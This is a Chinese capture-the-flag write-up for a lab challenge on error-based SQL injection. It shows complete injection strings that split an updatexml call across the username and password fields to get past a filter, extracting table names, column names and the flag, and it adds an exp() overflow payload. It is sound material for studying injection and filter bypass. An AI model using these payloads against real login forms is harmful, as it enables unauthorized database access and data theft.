实验吧-加了料的报错注入

前言

不得不说这一题对我来说挺有难度的，以前没有遇到过。看了别人的writeup过后，也想要记录一下，给自己攒攒经验
这题的解法有两种：
（1）HPF(http parameter fragment)
(2)exp()报错注入

HPF注入

查看源码：

就是要提交post数据，我直接在burpsuite里面操作。
随便输入两个参数，页面提示login failed。根据源码中的sql语句，我们试试username与password参数能否注入：

经过测试，两个参数都可以注入，但是有很多参数都过滤了，使用burp的intruder模块来大概测试一下到底哪些参数被过滤了,下面是username字段的结果：

union是过滤了的，=也是过滤了的
password也差不多是这些。但有一点值得注意：

如上图，password字段输入（）时，显示的是login failed但是username字段则是

user name unkwon error，可以推断username字段过滤了（）,而password没有过滤（），但是有趣的是username没有过滤可以利用的函数名，例如extractvalue，但是password字段过滤了函数名，意思就是只有拼接一下这两个字段才能完成漏洞的利用，所以我们需要用到注释符：/**/
接下来就是正常的注入流程了：
爆表名：
username=' or updatexml/*&password=1*/(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema regexp database()),0x7e),1) or '

爆字段名：
username=' or updatexml/*&password=1*/(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema regexp database() and table_name regexp 0x66666c6c34346a6a),0x7e),1) or '
这里的表明转换成16进制

接下来查表：
username=' or updatexml/*&password=1*/(1,concat(0x7e,(select value from ffll44jj),0x7e),1) or '

得到flag：flag{err0r_b4sed_sqli_+_hpf}
####利用exp()报错注入
由于出题人需要利用正则代替等号，所以也就没有过滤exp()函数。
有关exp()溢出报错注入，戳这里：http://drops.xmd5.com/static/drops/tips-8166.html
我们直接上利用语句：

username=1l&password=1' or exp(~(select * from (select value from ffll44jj)x)) or '